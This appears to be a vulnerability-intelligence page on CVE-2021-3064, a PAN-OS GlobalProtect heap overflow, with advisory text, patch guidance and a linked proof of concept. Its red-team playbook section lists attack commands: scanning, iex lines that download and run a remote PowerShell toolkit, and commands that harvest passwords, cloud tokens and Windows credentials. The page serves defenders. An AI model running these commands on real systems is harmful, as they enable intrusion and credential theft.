CVE-2021-3064
Overview
This vulnerability is a memory corruption flaw rooted in unsafe handling of input data within the GlobalProtect portal and gateway interfaces of Palo Alto Networks PAN-OS. Specifically, improper memory operations lead to heap buffer overflow conditions, affecting the network-facing GlobalProtect component. The flaw arises from inadequate bounds checking during processing of network requests, resulting in corruption of system memory structures.
Vulnerability Description
A memory corruption vulnerability exists in Palo Alto Networks GlobalProtect portal and gateway interfaces that enables an unauthenticated network-based attacker to disrupt system processes and potentially execute arbitrary code with root privileges. The attacker must have network access to the GlobalProtect interface to exploit this issue. This issue impacts PAN-OS 8.1 versions earlier than PAN-OS 8.1.17. Prisma Access customers are not impacted by this issue.
Impact
An unauthenticated attacker with network access to the GlobalProtect interface can exploit this vulnerability to execute arbitrary code with root privileges, potentially gaining full control over the affected device. This can lead to disruption of system processes, unauthorized access to sensitive data, and compromise of network security infrastructure. The attack requires no user interaction or authentication, as indicated by the CVSS vector AV:N/AC:L/PR:N/UI:N, making it highly exploitable in exposed environments.
Solution
Palo Alto Networks has addressed this issue in PAN-OS version 8.1.17. Administrators should upgrade affected PAN-OS 8.1 deployments to 8.1.17 or later as detailed in the official security advisory available at https://security.paloaltonetworks.com/CVE-2021-3064. Prisma Access customers are not impacted and no action is required for those environments.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
A critical memory corruption vulnerability has been identified in the GlobalProtect portal and gateway interfaces of Palo Alto Networks' PAN-OS, specifically affecting versions prior to 8.1.17. This flaw allows an unauthenticated attacker with network access to the GlobalProtect interface to disrupt system processes. The nature of memory corruption vulnerabilities often leads to unpredictable behavior, including the potential execution of arbitrary code with root privileges. This level of access can enable attackers to manipulate the system at a fundamental level, posing a significant risk to the integrity and confidentiality of the affected systems.
Attack vectors for this vulnerability are particularly concerning due to the requirement of only network access to the GlobalProtect interface. An attacker could exploit this flaw remotely, bypassing traditional authentication mechanisms. Scenarios may include sending specially crafted packets to the vulnerable interfaces, which could lead to memory corruption and subsequent execution of malicious code. This could allow the attacker to take control of the system, deploy malware, or exfiltrate sensitive data. The ease of exploitation, combined with the high privileges that could be obtained, makes this vulnerability a prime target for attackers seeking to compromise enterprise environments.
The real-world impact of this vulnerability is profound, especially for organizations relying on Palo Alto Networks' solutions for their network security. The ability for an attacker to execute arbitrary code with root privileges could lead to complete system compromise, resulting in data breaches, service disruptions, and significant financial losses. Additionally, the reputational damage that may follow a successful exploitation could deter customers and partners from engaging with affected organizations. The business risk is further amplified by the potential for regulatory repercussions, particularly if sensitive data is involved, leading to fines and legal liabilities.
To detect and mitigate this vulnerability, organizations should prioritize updating their PAN-OS to version 8.1.17 or later, as this version addresses the identified flaw. Regular patch management practices are essential in maintaining system security and should include monitoring for updates from Palo Alto Networks. Additionally, implementing network segmentation can help limit access to the GlobalProtect interface, reducing the attack surface. Intrusion detection systems (IDS) can also be employed to monitor for unusual traffic patterns that may indicate exploitation attempts. Organizations should conduct regular security assessments and penetration testing to identify and remediate vulnerabilities proactively.
In conclusion, the memory corruption vulnerability in Palo Alto Networks' GlobalProtect interfaces presents a significant threat to organizations using affected versions of PAN-OS. The potential for remote exploitation with root privileges underscores the importance of timely updates and robust security practices. By understanding the technical details, attack vectors, and real-world implications, organizations can better prepare to defend against such vulnerabilities and protect their critical assets.
Recent CSURFACE threat intelligence indicates a moderate increase in the Exploit Prediction Scoring System (EPSS) for CVE-2021-3064, rising by over 11% to a score that places it near the top percentile of actively exploited vulnerabilities. This uptick reflects growing attacker interest and potential exploitation attempts in the wild, corroborated by the emergence of new proof-of-concept exploits targeting the vulnerable PAN-OS GlobalProtect interfaces. While the short-term trend remains stable, the elevated EPSS score signals that this vulnerability continues to be a high-value target for threat actors aiming to achieve remote code execution with root privileges. For defenders, this development underscores the urgency of maintaining vigilant monitoring and reinforces the criticality of timely patch management. The risk posture associated with CVE-2021-3064 has thus intensified, warranting heightened attention within security operations to detect and respond to exploitation attempts promptly.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Paloaltonetworks | Pan-Os | All |
cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (1)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
0xhaggis/CVE-2021-3064
Exploit for CVE-2021-3036, HTTP Smuggling + buffer overflow in PanOS 8.x
|
0xhaggis | 1 | 1 | 2022-04-26 | View |
Threat Feed
12 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (2)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2021-3064 |
| security.paloaltonetworks.com |
GitHub CVE
x_refsource_MISC
|
https://security.paloaltonetworks.com/CVE-2021-3064 |